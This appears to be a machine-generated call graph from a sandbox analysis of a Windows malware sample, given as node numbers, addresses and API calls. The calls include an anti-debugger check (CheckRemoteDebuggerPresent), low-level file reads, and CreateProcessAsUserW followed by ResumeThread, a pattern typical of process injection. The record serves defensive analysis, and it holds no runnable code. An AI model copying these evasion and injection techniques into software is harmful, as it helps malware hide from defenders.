28a0810 35428->35429 35430 2884860 11 API calls 35429->35430 35431 28a0831 35430->35431 35432 28a0849 35431->35432 35433 28847ec 11 API calls 35432->35433 35434 28a0868 35433->35434 35435 28846d4 35434->35435 35436 28a0880 35435->35436 35437 28989d0 20 API calls 35436->35437 35438 28a088c 35437->35438 35439 2884860 11 API calls 35438->35439 35440 28a08ad 35439->35440 35441 28a08c5 35440->35441 35442 28847ec 11 API calls 35441->35442 35443 28a08e4 35442->35443 35444 28846d4 35443->35444 35445 28a08fc 35444->35445 35446 28989d0 20 API calls 35445->35446 35447 28a0908 35446->35447 35448 2884860 11 API calls 35447->35448 35449 28a0929 35448->35449 35450 28a0941 35449->35450 35451 28847ec 11 API calls 35450->35451 35452 28a0960 35451->35452 35453 28846d4 35452->35453 35454 28a0978 35453->35454 35455 28989d0 20 API calls 35454->35455 35456 28a0984 35455->35456 35457 289e0f8 11 API calls 35456->35457 35458 28a0994 35457->35458 35459 2884530 11 API calls 35458->35459 35460 28a09a4 35459->35460 35461 2884860 11 API calls 35460->35461 35462 28a09c5 35461->35462 35463 28a09d0 35462->35463 35464 28847ec 11 API calls 35463->35464 35465 28a09fc 35464->35465 35466 28a0a07 35465->35466 35467 28a0a14 35466->35467 35468 28989d0 20 API calls 35467->35468 35469 28a0a20 35468->35469 35470 2884860 11 API calls 35469->35470 35471 28a0a41 35470->35471 35472 28a0a4c 35471->35472 35473 28847ec 11 API calls 35472->35473 35474 28a0a78 35473->35474 35475 28a0a83 35474->35475 35476 28a0a90 35475->35476 35477 28989d0 20 API calls 35476->35477 35478 28a0a9c 35477->35478 35479 2884860 11 API calls 35478->35479 35480 28a0abd 35479->35480 35481 28a0ac8 35480->35481 35482 28846d4 35481->35482 35483 28a0ad5 35482->35483 35484 28847ec 11 API calls 35483->35484 35485 28a0af4 35484->35485 35486 28a0aff 35485->35486 35487 28a0b0c 35486->35487 35488 28989d0 20 API calls 35487->35488 35489 28a0b18 35488->35489 35490 28849a0 35489->35490 35491 28a0b22 35490->35491 35492 28a0b2f 35491->35492 35493 2887e5c GetFileAttributesA 35492->35493 35494 28a0b3a 35493->35494 35495 28a12fe 35494->35495 35496 28a0b42 35494->35496 35497 2884860 11 API calls 35495->35497 35498 2884860 11 API calls 35496->35498 35499 28a131f 35497->35499 35500 28a0b63 35498->35500 35501 28a1337 35499->35501 35502 28a0b7b 35500->35502 35504 28847ec 11 API calls 35501->35504 35503 28847ec 11 API calls 35502->35503 35505 28a0b9a 35503->35505 35506 28a1356 35504->35506 35508 28a0bb2 35505->35508 35507 28a1361 35506->35507 35509 28989d0 20 API calls 35507->35509 35510 28989d0 20 API calls 35508->35510 35511 28a137a 35509->35511 35512 28a0bbe 35510->35512 35513 2884860 11 API calls 35511->35513 35514 2884860 11 API calls 35512->35514 35515 28a139b 35513->35515 35516 28a0bdf 35514->35516 35517 28a13b3 35515->35517 35518 28a0bf7 35516->35518 35519 28847ec 11 API calls 35517->35519 35520 28847ec 11 API calls 35518->35520 35522 28a13d2 35519->35522 35521 28a0c16 35520->35521 35523 28a0c2e 35521->35523 35524 28a13dd 35522->35524 35526 28989d0 20 API calls 35523->35526 35525 28989d0 20 API calls 35524->35525 35527 28a13f6 35525->35527 35528 28a0c3a 35526->35528 35529 2884860 11 API calls 35527->35529 35530 2884860 11 API calls 35528->35530 35531 28a1417 35529->35531 35532 28a0c5b 35530->35532 35535 28a1422 35531->35535 35533 28849a0 35532->35533 35534 28a0c66 35533->35534 35537 28847ec 11 API calls 35534->35537 35536 28847ec 11 API calls 35535->35536 35538 28a144e 35536->35538 35539 28a0c92 35537->35539 35540 28849a0 35538->35540 35541 28a0c9d 35539->35541 35542 28a1459 35540->35542 35543 28846d4 35541->35543 35544 28a1466 35542->35544 35545 28a0caa 35543->35545 35547 28989d0 20 API calls 35544->35547 35546 28989d0 20 API calls 35545->35546 35549 28a0cb6 35546->35549 35548 28a1472 35547->35548 37558 2884de0 35548->37558 35551 2884de0 35549->35551 35553 28a0cc7 35551->35553 38055 289dd70 35553->38055 35559 2884530 11 API calls 35561 28a0ce8 35559->35561 35563 2884860 11 API calls 35561->35563 35565 28a0d09 35563->35565 35566 28a0d14 35565->35566 35567 28846d4 35566->35567 35568 28a0d21 35567->35568 35570 28847ec 11 API calls 35568->35570 35572 28a0d40 35570->35572 35576 28a0d4b 35572->35576 35577 28846d4 35576->35577 35578 28a0d58 35577->35578 35580 28989d0 20 API calls 35578->35580 35582 28a0d64 35580->35582 35584 2884860 11 API calls 35582->35584 35586 28a0d85 35584->35586 35587 28a0d90 35586->35587 35588 28a0d9d 35587->35588 35591 28847ec 11 API calls 35588->35591 35592 28a0dbc 35591->35592 35595 28a0dc7 35592->35595 35597 28846d4 35595->35597 35600 28a0dd4 35597->35600 35602 28989d0 20 API calls 35600->35602 35604 28a0de0 35602->35604 35606 2884860 11 API calls 35604->35606 35608 28a0e01 35606->35608 35610 28849a0 35608->35610 35611 28a0e0c 35610->35611 35612 28a0e19 35611->35612 35615 28847ec 11 API calls 35612->35615 35617 28a0e38 35615->35617 35618 28849a0 35617->35618 35619 28a0e43 35618->35619 35620 28846d4 35619->35620 35622 28a0e50 35620->35622 35624 28989d0 20 API calls 35622->35624 35627 28a0e5c 35624->35627 35629 289e24c 16 API calls 35627->35629 35631 28a0e71 35629->35631 35633 2885818 13 API calls 35631->35633 35635 28a0e84 35633->35635 35637 2884860 11 API calls 35635->35637 35639 28a0ea5 35637->35639 35640 28846d4 35639->35640 35642 28a0ebd 35640->35642 35644 28847ec 11 API calls 35642->35644 35645 28a0edc 35644->35645 35647 28846d4 35645->35647 35649 28a0ef4 35647->35649 35651 28989d0 20 API calls 35649->35651 35653 28a0f00 35651->35653 35655 2884860 11 API calls 35653->35655 35656 28a0f21 35655->35656 35658 28a0f39 35656->35658 35660 28847ec 11 API calls 35658->35660 35662 28a0f58 35660->35662 35663 28a0f70 35662->35663 35665 28989d0 20 API calls 35663->35665 35668 28a0f7c 35665->35668 35670 2884530 11 API calls 35668->35670 35671 28a0f8b 35670->35671 38070 289e1d4 35671->38070 35675 28a2ad8 35677 2884860 11 API calls 35675->35677 35676 28a0f9d 35678 2884860 11 API calls 35676->35678 35679 28a2af9 35677->35679 35681 28a0fbe 35678->35681 35682 28a2b04 35679->35682 35684 28a0fc9 35681->35684 35686 28a2b11 35682->35686 35685 28a0fd6 35684->35685 35687 28847ec 11 API calls 35685->35687 35688 28847ec 11 API calls 35686->35688 35690 28a0ff5 35687->35690 35691 28a2b30 35688->35691 35693 28849a0 35690->35693 35699 28a2b3b 35691->35699 35695 28a1000 35693->35695 35698 28846d4 35695->35698 35701 28a100d 35698->35701 35702 28989d0 20 API calls 35699->35702 35704 28989d0 20 API calls 35701->35704 35705 28a2b54 35702->35705 35707 28a1019 35704->35707 35708 2884860 11 API calls 35705->35708 35710 2884860 11 API calls 35707->35710 35711 28a2b75 35708->35711 35713 28a103a 35710->35713 35715 28a2b80 35711->35715 35717 28a1045 35713->35717 35718 28a2b8d 35715->35718 35719 28a1052 35717->35719 35721 28847ec 11 API calls 35718->35721 35723 28847ec 11 API calls 35719->35723 35724 28a2bac 35721->35724 35726 28a1071 35723->35726 35729 28a2bb7 35724->35729 35728 28a107c 35726->35728 35731 28a1089 35728->35731 35736 28989d0 20 API calls 35729->35736 35735 28989d0 20 API calls 35731->35735 35739 28a1095 35735->35739 35737 28a2bd0 35736->35737 35740 2884860 11 API calls 35737->35740 35742 2884860 11 API calls 35739->35742 35743 28a2bf1 35740->35743 35745 28a10b6 35742->35745 35748 28846d4 35743->35748 35747 28a10c1 35745->35747 35753 28847ec 11 API calls 35747->35753 35749 28a2c09 35748->35749 35751 28847ec 11 API calls 35749->35751 35754 28a2c28 35751->35754 35756 28a10ed 35753->35756 35757 28a2c33 35754->35757 35759 28a10f8 35756->35759 35762 28a2c40 35757->35762 35760 28a1105 35759->35760 35764 28989d0 20 API calls 35760->35764 35765 28989d0 20 API calls 35762->35765 35767 28a1111 35764->35767 35768 28a2c4c 35765->35768 35771 2884860 11 API calls 35767->35771 35772 2884860 11 API calls 35768->35772 35775 28a1132 35771->35775 35773 28a2c6d 35772->35773 35778 28a2c78 35773->35778 35777 28849a0 35775->35777 35780 28a113d 35777->35780 35781 28847ec 11 API calls 35778->35781 35782 28847ec 11 API calls 35780->35782 35783 28a2ca4 35781->35783 35785 28a1169 35782->35785 35788 28a2caf 35783->35788 35787 28849a0 35785->35787 35790 28a1174 35787->35790 35794 28989d0 20 API calls 35788->35794 35791 28a1181 35790->35791 35793 28989d0 20 API calls 35791->35793 35795 28a118d 35793->35795 35796 28a2cc8 35794->35796 35797 2884860 11 API calls 35795->35797 35796->35193 35800 28a2ced 35796->35800 35799 28a11ae 35797->35799 35804 28849a0 35799->35804 35802 2884860 11 API calls 35800->35802 35807 28a2d0e 35802->35807 35806 28a11b9 35804->35806 35809 28a2d26 35807->35809 35812 28847ec 11 API calls 35809->35812 35815 28a2d45 35812->35815 35819 28a2d50 35815->35819 35822 28a2d5d 35819->35822 35825 28989d0 20 API calls 35822->35825 35828 28a2d69 35825->35828 35831 2884860 11 API calls 35828->35831 37529 2882ef8 GetTickCount 37528->37529 37530 2882eed 37528->37530 37529->35120 37530->35120 37532 289f6fa GetProcAddress 37531->37532 37533 289f711 37531->37533 37534 289f709 37532->37534 37533->35192 37534->35192 37536 289f786 37535->37536 37537 289f760 GetProcAddress 37535->37537 37536->35193 37536->35197 37537->37536 37538 289f774 CheckRemoteDebuggerPresent 37537->37538 37538->37536 37540 28849a4 37539->37540 37540->35216 37548 289e114 37541->37548 37542 289e197 37543 28844dc 11 API calls 37542->37543 37544 289e19f 37543->37544 37546 2884530 11 API calls 37544->37546 37545 28849f8 11 API calls 37545->37548 37547 289e1aa 37546->37547 37549 2884500 11 API calls 37547->37549 37548->37542 37548->37545 37550 289e1c4 37549->37550 37550->35337 37552 28849a0 37551->37552 37553 2887e66 GetFileAttributesA 37552->37553 37554 2887e71 37553->37554 37554->35359 37554->35360 37556 28845cc 11 API calls 37555->37556 37557 288c38b 37556->37557 37557->35418 37559 2884de6 37558->37559 37559->37559 38056 2884f20 SysAllocStringLen 38055->38056 38057 289dd85 38056->38057 38058 28844dc 11 API calls 38057->38058 38059 289dd9a 38058->38059 38060 289ddaa RtlDosPathNameToNtPathName_U 38059->38060 38218 289dbdc 38060->38218 38062 289ddc6 NtOpenFile NtQueryInformationFile 38063 2884bcc 11 API calls 38062->38063 38064 289de01 38063->38064 38065 28849f8 11 API calls 38064->38065 38066 289de0d NtReadFile NtClose 38065->38066 38067 289de37 38066->38067 38068 2884c60 SysFreeString 38067->38068 38069 289de3f 38068->38069 38069->35559 38071 289e1e6 38070->38071 38219 2888d94 38071->38219 38074 28844dc 11 API calls 38075 289e239 38074->38075 38075->35675 38075->35676 38218->38062 38220 2888da1 38219->38220 38221 2888dc7 38220->38221 38223 2887660 42 API calls 38220->38223 38221->38074 38223->38221 38225 28a7074 38226 2884860 11 API calls 38225->38226 38227 28a7095 38226->38227 38228 28847ec 11 API calls 38227->38228 38229 28a70cc 38228->38229 38230 28989d0 20 API calls 38229->38230 38231 28a70f0 38230->38231 38232 2884860 11 API calls 38231->38232 38233 28a7111 38232->38233 38234 28847ec 11 API calls 38233->38234 38235 28a7148 38234->38235 38236 28989d0 20 API calls 38235->38236 38237 28a716c 38236->38237 38238 2884860 11 API calls 38237->38238 38239 28a718d 38238->38239 38240 28847ec 11 API calls 38239->38240 38241 28a71c4 38240->38241 38242 28989d0 20 API calls 38241->38242 38243 28a71e8 38242->38243 38244 2884860 11 API calls 38243->38244 38245 28a7209 38244->38245 38246 28847ec 11 API calls 38245->38246 38247 28a7240 38246->38247 38248 28989d0 20 API calls 38247->38248 38249 28a7264 38248->38249 38250 2884860 11 API calls 38249->38250 38251 28a7285 38250->38251 38252 28847ec 11 API calls 38251->38252 38253 28a72bc 38252->38253 38254 28989d0 20 API calls 38253->38254 38255 28a72e0 38254->38255 38256 2884860 11 API calls 38255->38256 38257 28a731a 38256->38257 38258 289e0f8 11 API calls 38257->38258 38259 28a7349 38258->38259 39046 289f214 38259->39046 38262 2884860 11 API calls 38263 28a7399 38262->38263 38264 28847ec 11 API calls 38263->38264 38265 28a73d0 38264->38265 38266 28989d0 20 API calls 38265->38266 38267 28a73f4 38266->38267 38268 2884860 11 API calls 38267->38268 38269 28a7415 38268->38269 38270 28847ec 11 API calls 38269->38270 38271 28a744c 38270->38271 38272 28989d0 20 API calls 38271->38272 38273 28a7470 38272->38273 38274 2884860 11 API calls 38273->38274 38275 28a7491 38274->38275 38276 28847ec 11 API calls 38275->38276 38277 28a74c8 38276->38277 38278 28989d0 20 API calls 38277->38278 38279 28a74ec 38278->38279 38280 2884860 11 API calls 38279->38280 38281 28a750d 38280->38281 38282 28847ec 11 API calls 38281->38282 38283 28a7544 38282->38283 38284 28989d0 20 API calls 38283->38284 38285 28a7568 38284->38285 38286 2884860 11 API calls 38285->38286 38287 28a7589 38286->38287 38288 28847ec 11 API calls 38287->38288 38289 28a75c0 38288->38289 38290 28989d0 20 API calls 38289->38290 38291 28a75e4 38290->38291 38292 2884860 11 API calls 38291->38292 38293 28a7605 38292->38293 38294 28847ec 11 API calls 38293->38294 38295 28a763c 38294->38295 38296 28989d0 20 API calls 38295->38296 38297 28a7660 38296->38297 38298 2884860 11 API calls 38297->38298 38299 28a7681 38298->38299 38300 28847ec 11 API calls 38299->38300 38301 28a76b8 38300->38301 38302 28989d0 20 API calls 38301->38302 38303 28a76dc 38302->38303 38304 2884860 11 API calls 38303->38304 38305 28a76fd 38304->38305 38306 28847ec 11 API calls 38305->38306 38307 28a7734 38306->38307 38308 28989d0 20 API calls 38307->38308 38309 28a7758 38308->38309 38310 2884860 11 API calls 38309->38310 38311 28a7779 38310->38311 38312 28847ec 11 API calls 38311->38312 38313 28a77b0 38312->38313 38314 28989d0 20 API calls 38313->38314 38315 28a77d4 38314->38315 38316 28a8318 38315->38316 38317 28a77e9 38315->38317 38319 2884860 11 API calls 38316->38319 38318 2884860 11 API calls 38317->38318 38320 28a780a 38318->38320 38321 28a8339 38319->38321 38322 28847ec 11 API calls 38320->38322 38323 28847ec 11 API calls 38321->38323 38325 28a7841 38322->38325 38324 28a8370 38323->38324 38326 28989d0 20 API calls 38324->38326 38327 28989d0 20 API calls 38325->38327 38328 28a8394 38326->38328 38329 28a7865 38327->38329 38330 2884860 11 API calls 38328->38330 38331 2884860 11 API calls 38329->38331 38333 28a83b5 38330->38333 38332 28a7886 38331->38332 38334 28847ec 11 API calls 38332->38334 38335 28847ec 11 API calls 38333->38335 38336 28a78bd 38334->38336 38337 28a83ec 38335->38337 38339 28989d0 20 API calls 38336->38339 38338 28989d0 20 API calls 38337->38338 38340 28a8410 38338->38340 38341 28a78e1 38339->38341 38342 2884860 11 API calls 38340->38342 38343 2884860 11 API calls 38341->38343 38345 28a8431 38342->38345 38344 28a7902 38343->38344 38346 28847ec 11 API calls 38344->38346 38347 28847ec 11 API calls 38345->38347 38348 28a7939 38346->38348 38349 28a8468 38347->38349 38350 28989d0 20 API calls 38348->38350 38351 28989d0 20 API calls 38349->38351 38352 28a795d 38350->38352 38353 28a848c 38351->38353 38355 28847ec 11 API calls 38352->38355 38354 2884860 11 API calls 38353->38354 38357 28a84ad 38354->38357 38356 28a7975 38355->38356 38358 28985bc 18 API calls 38356->38358 38361 28847ec 11 API calls 38357->38361 38359 28a7986 38358->38359 38360 2884860 11 API calls 38359->38360 38362 28a79a7 38360->38362 38363 28a84e4 38361->38363 38364 28847ec 11 API calls 38362->38364 38365 28989d0 20 API calls 38363->38365 38369 28a79de 38364->38369 38366 28a8508 38365->38366 38367 28a851d 38366->38367 38368 28a93a1 38366->38368 38370 2884860 11 API calls 38367->38370 38371 2884860 11 API calls 38368->38371 38373 28989d0 20 API calls 38369->38373 38372 28a853e 38370->38372 38376 28a93c2 38371->38376 38377 28a8556 38372->38377 38374 28a7a02 38373->38374 38375 2884860 11 API calls 38374->38375 38380 28a7a23 38375->38380 38378 28847ec 11 API calls 38376->38378 38379 28847ec 11 API calls 38377->38379 38383 28a93f9 38378->38383 38381 28a8575 38379->38381 38382 28847ec 11 API calls 38380->38382 38384 28a858d 38381->38384 38387 28a7a5a 38382->38387 38385 28989d0 20 API calls 38383->38385 38386 28989d0 20 API calls 38384->38386 38388 28a941d 38385->38388 38389 28a8599 38386->38389 38393 28989d0 20 API calls 38387->38393 38390 2884860 11 API calls 38388->38390 38391 2884860 11 API calls 38389->38391 38396 28a943e 38390->38396 38392 28a85ba 38391->38392 38397 28a85c5 38392->38397 38394 28a7a7e 38393->38394 38395 2884860 11 API calls 38394->38395 38400 28a7a9f 38395->38400 38398 28847ec 11 API calls 38396->38398 38399 28847ec 11 API calls 38397->38399 38403 28a9475 38398->38403 38401 28a85f1 38399->38401 38402 28847ec 11 API calls 38400->38402 38404 28a85fc 38401->38404 38407 28a7ad6 38402->38407 38405 28989d0 20 API calls 38403->38405 38406 28989d0 20 API calls 38404->38406 38408 28a9499 38405->38408 38409 28a8615 38406->38409 38412 28989d0 20 API calls 38407->38412 38410 2884860 11 API calls 38408->38410 38411 2884860 11 API calls 38409->38411 38414 28a94ba 38410->38414 38413 28a8636 38411->38413 38415 28a7afa 38412->38415 38416 28847ec 11 API calls 38413->38416 38417 28847ec 11 API calls 38414->38417 38418 289adf8 32 API calls 38415->38418 38422 28a866d 38416->38422 38421 28a94f1 38417->38421 38419 28a7b21 38418->38419 38420 2884860 11 API calls 38419->38420 38425 28a7b42 38420->38425 38423 28989d0 20 API calls 38421->38423 38424 28989d0 20 API calls 38422->38424 38434 28a9515 38423->38434 38426 28a8691 38424->38426 38428 28847ec 11 API calls 38425->38428 38427 28847ec 11 API calls 38426->38427 38429 28a86bd 38427->38429 38433 28a7b79 38428->38433 38432 28a86d5 38429->38432 38430 28a9cf5 38431 2884860 11 API calls 38430->38431 38436 28a9d16 38431->38436 38437 28a86e0 CreateProcessAsUserW 38432->38437 38438 28989d0 20 API calls 38433->38438 38434->38430 38435 2884860 11 API calls 38434->38435 38446 28a9560 38435->38446 38442 28847ec 11 API calls 38436->38442 38439 28a876e 38437->38439 38440 28a86f2 38437->38440 38441 28a7b9d 38438->38441 38443 2884860 11 API calls 38439->38443 38444 2884860 11 API calls 38440->38444 38445 2884860 11 API calls 38441->38445 38451 28a9d4d 38442->38451 38452 28a878f 38443->38452 38447 28a8713 38444->38447 38450 28a7bbe 38445->38450 38448 28847ec 11 API calls 38446->38448 38449 28a871e 38447->38449 38457 28a9597 38448->38457 38456 28847ec 11 API calls 38449->38456 38453 28847ec 11 API calls 38450->38453 38454 28989d0 20 API calls 38451->38454 38455 28847ec 11 API calls 38452->38455 38463 28a7bf5 38453->38463 38458 28a9d71 38454->38458 38465 28a87c6 38455->38465 38459 28a874a 38456->38459 38461 28989d0 20 API calls 38457->38461 38460 2884860 11 API calls 38458->38460 38462 28a8755 38459->38462 38469 28a9d92 38460->38469 38464 28a95bb 38461->38464 38467 28989d0 20 API calls 38462->38467 38468 28989d0 20 API calls 38463->38468 38466 2884860 11 API calls 38464->38466 38470 28989d0 20 API calls 38465->38470 38476 28a95dc 38466->38476 38467->38439 38471 28a7c19 38468->38471 38473 28847ec 11 API calls 38469->38473 38472 28a87ea 38470->38472 38475 2884860 11 API calls 38471->38475 38474 2884860 11 API calls 38472->38474 38479 28a9dc9 38473->38479 38480 28a880b 38474->38480 38478 28a7c3a 38475->38478 38477 28847ec 11 API calls 38476->38477 38484 28a9613 38477->38484 38481 28847ec 11 API calls 38478->38481 38482 28989d0 20 API calls 38479->38482 38483 28847ec 11 API calls 38480->38483 38488 28a7c71 38481->38488 38485 28a9ded 38482->38485 38490 28a8842 38483->38490 38487 28989d0 20 API calls 38484->38487 38486 2884860 11 API calls 38485->38486 38493 28a9e0e 38486->38493 38489 28a9637 38487->38489 38492 28989d0 20 API calls 38488->38492 38491 2884860 11 API calls 38489->38491 38494 28989d0 20 API calls 38490->38494 38499 28a9658 38491->38499 38495 28a7c95 38492->38495 38497 28847ec 11 API calls 38493->38497 38496 28a8866 38494->38496 38501 2884860 11 API calls 38495->38501 38498 28849f8 11 API calls 38496->38498 38503 28a9e45 38497->38503 38500 28a888a 38498->38500 38502 28847ec 11 API calls 38499->38502 38504 2884860 11 API calls 38500->38504 38505 28a7cd5 38501->38505 38508 28a968f 38502->38508 38506 28989d0 20 API calls 38503->38506 38507 28a88b9 38504->38507 38509 28847ec 11 API calls 38505->38509 38512 28a9e69 38506->38512 38513 28a88c4 38507->38513 38510 28989d0 20 API calls 38508->38510 38516 28a7d0c 38509->38516 38511 28a96b3 38510->38511 38514 289f094 11 API calls 38511->38514 38518 28989d0 20 API calls 38512->38518 38515 28847ec 11 API calls 38513->38515 38517 28a96ce 38514->38517 38519 28a88f0 38515->38519 38521 28989d0 20 API calls 38516->38521 38520 2884860 11 API calls 38517->38520 38524 28a9e9c 38518->38524 38525 28a88fb 38519->38525 38527 28a96f7 38520->38527 38522 28a7d30 38521->38522 38523 2884860 11 API calls 38522->38523 38532 28a7d51 38523->38532 38528 28989d0 20 API calls 38524->38528 38526 28989d0 20 API calls 38525->38526 38529 28a8914 38526->38529 38531 2884860 11 API calls 38527->38531 38534 28a9ecf 38528->38534 38530 2884860 11 API calls 38529->38530 38536 28a8935 38530->38536 38535 28a972f 38531->38535 38533 28847ec 11 API calls 38532->38533 38541 28a7d88 38533->38541 38537 28989d0 20 API calls 38534->38537 38538 28847ec 11 API calls 38535->38538 38540 28847ec 11 API calls 38536->38540 38539 28a9f02 38537->38539 38543 28a9766 38538->38543 38547 28989d0 20 API calls 38539->38547 38544 28a896c 38540->38544 38542 28989d0 20 API calls 38541->38542 38545 28a7dac 38542->38545 38548 28989d0 20 API calls 38543->38548 38550 28989d0 20 API calls 38544->38550 38546 2884860 11 API calls 38545->38546 38556 28a7dcd 38546->38556 38549 28a9f35 38547->38549 38551 28a978a 38548->38551 38552 2884860 11 API calls 38549->38552 38553 28a8990 38550->38553 38555 2884860 11 API calls 38551->38555 38557 28a9f56 38552->38557 38554 2884860 11 API calls 38553->38554 38560 28a89b1 38554->38560 38559 28a97ab 38555->38559 38558 28847ec 11 API calls 38556->38558 38561 28847ec 11 API calls 38557->38561 38564 28a7e04 38558->38564 38562 28847ec 11 API calls 38559->38562 38563 28847ec 11 API calls 38560->38563 38566 28a9f8d 38561->38566 38568 28a97e2 38562->38568 38569 28a89e8 38563->38569 38565 28989d0 20 API calls 38564->38565 38567 28a7e28 38565->38567 38570 28989d0 20 API calls 38566->38570 38571 2895aec 42 API calls 38567->38571 38572 28989d0 20 API calls 38568->38572 38574 28989d0 20 API calls 38569->38574 38573 28a9fb1 38570->38573 38575 28a7e54 38571->38575 38576 28a9806 38572->38576 38577 2884860 11 API calls 38573->38577 38578 28a8a0c 38574->38578 38584 2884bcc 11 API calls 38575->38584 38579 2887e5c GetFileAttributesA 38576->38579 38588 28a9fd2 38577->38588 39058 289d164 23 API calls 38578->39058 38581 28a9810 38579->38581 38585 28a9818 38581->38585 38586 28a9aef 38581->38586 38582 28a8a20 38583 2884860 11 API calls 38582->38583 38593 28a8a46 38583->38593 38589 28a7e69 38584->38589 38590 2884860 11 API calls 38585->38590 38587 2884860 11 API calls 38586->38587 38595 28a9b10 38587->38595 38592 28847ec 11 API calls 38588->38592 38591 2884860 11 API calls 38589->38591 38594 28a9839 38590->38594 38596 28a7e8a 38591->38596 38600 28aa009 38592->38600 38597 28847ec 11 API calls 38593->38597 38598 28847ec 11 API calls 38594->38598 38599 28847ec 11 API calls 38595->38599 38601 28847ec 11 API calls 38596->38601 38604 28a8a7d 38597->38604 38605 28a9870 38598->38605 38606 28a9b47 38599->38606 38602 28989d0 20 API calls 38600->38602 38608 28a7ec1 38601->38608 38603 28aa02d 38602->38603 38607 2884860 11 API calls 38603->38607 38609 28989d0 20 API calls 38604->38609 38610 28989d0 20 API calls 38605->38610 38611 28989d0 20 API calls 38606->38611 38620 28aa04e 38607->38620 38613 28989d0 20 API calls 38608->38613 38612 28a8aa1 38609->38612 38614 28a9894 38610->38614 38615 28a9b6b 38611->38615 38616 2884860 11 API calls 38612->38616 38617 28a7ee5 38613->38617 38618 2884860 11 API calls 38614->38618 38619 2884860 11 API calls 38615->38619 38622 28a8ac2 38616->38622 38623 28849f8 11 API calls 38617->38623 38624 28a98b5 38618->38624 38625 28a9b8c 38619->38625 38621 28847ec 11 API calls 38620->38621 38632 28aa085 38621->38632 38628 28847ec 11 API calls 38622->38628 38626 28a7f02 38623->38626 38630 28847ec 11 API calls 38624->38630 38631 28847ec 11 API calls 38625->38631 38627 2897e50 18 API calls 38626->38627 38629 28a7f08 38627->38629 38635 28a8af9 38628->38635 38633 2884860 11 API calls 38629->38633 38636 28a98ec 38630->38636 38637 28a9bc3 38631->38637 38634 28989d0 20 API calls 38632->38634 38638 28a7f29 38633->38638 38642 28aa0a9 38634->38642 38639 28989d0 20 API calls 38635->38639 38640 28989d0 20 API calls 38636->38640 38641 28989d0 20 API calls 38637->38641 38644 28847ec 11 API calls 38638->38644 38643 28a8b1d 38639->38643 38645 28a9910 38640->38645 38646 28a9be7 38641->38646 38650 28989d0 20 API calls 38642->38650 38647 2884860 11 API calls 38643->38647 38652 28a7f60 38644->38652 38648 2884860 11 API calls 38645->38648 38649 2884860 11 API calls 38646->38649 38651 28a8b3e 38647->38651 38655 28a9931 38648->38655 38653 28a9c08 38649->38653 38654 28aa0dc 38650->38654 38656 28847ec 11 API calls 38651->38656 38657 28989d0 20 API calls 38652->38657 38659 28847ec 11 API calls 38653->38659 38660 28989d0 20 API calls 38654->38660 38658 28847ec 11 API calls 38655->38658 38663 28a8b75 38656->38663 38661 28a7f84 38657->38661 38664 28a9968 38658->38664 38665 28a9c3f 38659->38665 38666 28aa10f 38660->38666 38662 2884860 11 API calls 38661->38662 38667 28a7fa5 38662->38667 38668 28989d0 20 API calls 38663->38668 38669 28989d0 20 API calls 38664->38669 38670 28989d0 20 API calls 38665->38670 38671 28989d0 20 API calls 38666->38671 38673 28847ec 11 API calls 38667->38673 38672 28a8b99 38668->38672 38674 28a998c 38669->38674 38675 28a9c63 38670->38675 38684 28aa142 38671->38684 38676 28a8bb9 38672->38676 38677 28a8ba2 38672->38677 38685 28a7fdc 38673->38685 38678 289e358 11 API calls 38674->38678 38679 2884860 11 API calls 38675->38679 38681 2884860 11 API calls 38676->38681 39059 2898730 17 API calls 38677->39059 38682 28a99a1 38678->38682 38689 28a9c84 38679->38689 38687 28a8bda 38681->38687 38683 2884530 11 API calls 38682->38683 38686 28a99b1 38683->38686 38690 28989d0 20 API calls 38684->38690 38691 28989d0 20 API calls 38685->38691 38688 2884860 11 API calls 38686->38688 38693 28847ec 11 API calls 38687->38693 38696 28a99d2 38688->38696 38692 28847ec 11 API calls 38689->38692 38697 28aa175 38690->38697 38694 28a8000 38691->38694 38699 28a9cbb 38692->38699 38701 28a8c11 38693->38701 38695 2884860 11 API calls 38694->38695 38702 28a8021 38695->38702 38698 28847ec 11 API calls 38696->38698 38700 28989d0 20 API calls 38697->38700 38710 28a9a09 38698->38710 38704 28989d0 20 API calls 38699->38704 38703 28aa1a8 38700->38703 38706 28989d0 20 API calls 38701->38706 38707 28847ec 11 API calls 38702->38707 38705 2884860 11 API calls 38703->38705 38708 28a9cdf 38704->38708 38716 28aa1c9 38705->38716 38709 28a8c35 38706->38709 38717 28a8058 38707->38717 38711 28849f8 11 API calls 38708->38711 38712 2884860 11 API calls 38709->38712 38714 28989d0 20 API calls 38710->38714 38713 28a9ce9 38711->38713 38721 28a8c56 38712->38721 39060 2898d70 31 API calls 38713->39060 38718 28a9a2d 38714->38718 38720 28847ec 11 API calls 38716->38720 38722 28989d0 20 API calls 38717->38722 38719 2884860 11 API calls 38718->38719 38727 28a9a4e 38719->38727 38726 28aa200 38720->38726 38723 28847ec 11 API calls 38721->38723 38724 28a807c 38722->38724 38730 28a8c8d 38723->38730 38725 2884860 11 API calls 38724->38725 38731 28a809d 38725->38731 38729 28989d0 20 API calls 38726->38729 38728 28847ec 11 API calls 38727->38728 38737 28a9a85 38728->38737 38732 28aa224 38729->38732 38734 28989d0 20 API calls 38730->38734 38735 28847ec 11 API calls 38731->38735 38733 2884860 11 API calls 38732->38733 38740 28aa245 38733->38740 38736 28a8cb1 38734->38736 38741 28a80d4 38735->38741 38738 2884860 11 API calls 38736->38738 38739 28989d0 20 API calls 38737->38739 38743 28a8cd2 38738->38743 38749 28a9aa9 38739->38749 38742 28847ec 11 API calls 38740->38742 38744 28989d0 20 API calls 38741->38744 38748 28aa27c 38742->38748 38746 28847ec 11 API calls 38743->38746 38745 28a80f8 38744->38745 38747 289b118 43 API calls 38745->38747 38751 28a8d09 38746->38751 38753 28a8109 38747->38753 38750 28989d0 20 API calls 38748->38750 38752 289dc8c 17 API calls 38749->38752 38756 28aa2a0 38750->38756 38754 28989d0 20 API calls 38751->38754 38752->38586 38755 28a8d2d ResumeThread 38754->38755 38757 2884860 11 API calls 38755->38757 38758 28989d0 20 API calls 38756->38758 38761 28a8d59 38757->38761 38759 28aa2d3 38758->38759 38760 2884860 11 API calls 38759->38760 38763 28aa2f4 38760->38763 38762 28847ec 11 API calls 38761->38762 38764 28a8d90 38762->38764 38765 28847ec 11 API calls 38763->38765 38766 28989d0 20 API calls 38764->38766 38768 28aa32b 38765->38768 38767 28a8db4 38766->38767 38769 2884860 11 API calls 38767->38769 38770 28989d0 20 API calls 38768->38770 38773 28a8dd5 38769->38773 38771 28aa34f 38770->38771 38772 2884860 11 API calls 38771->38772 38775 28aa370 38772->38775 38774 28847ec 11 API calls 38773->38774 38777 28a8e0c 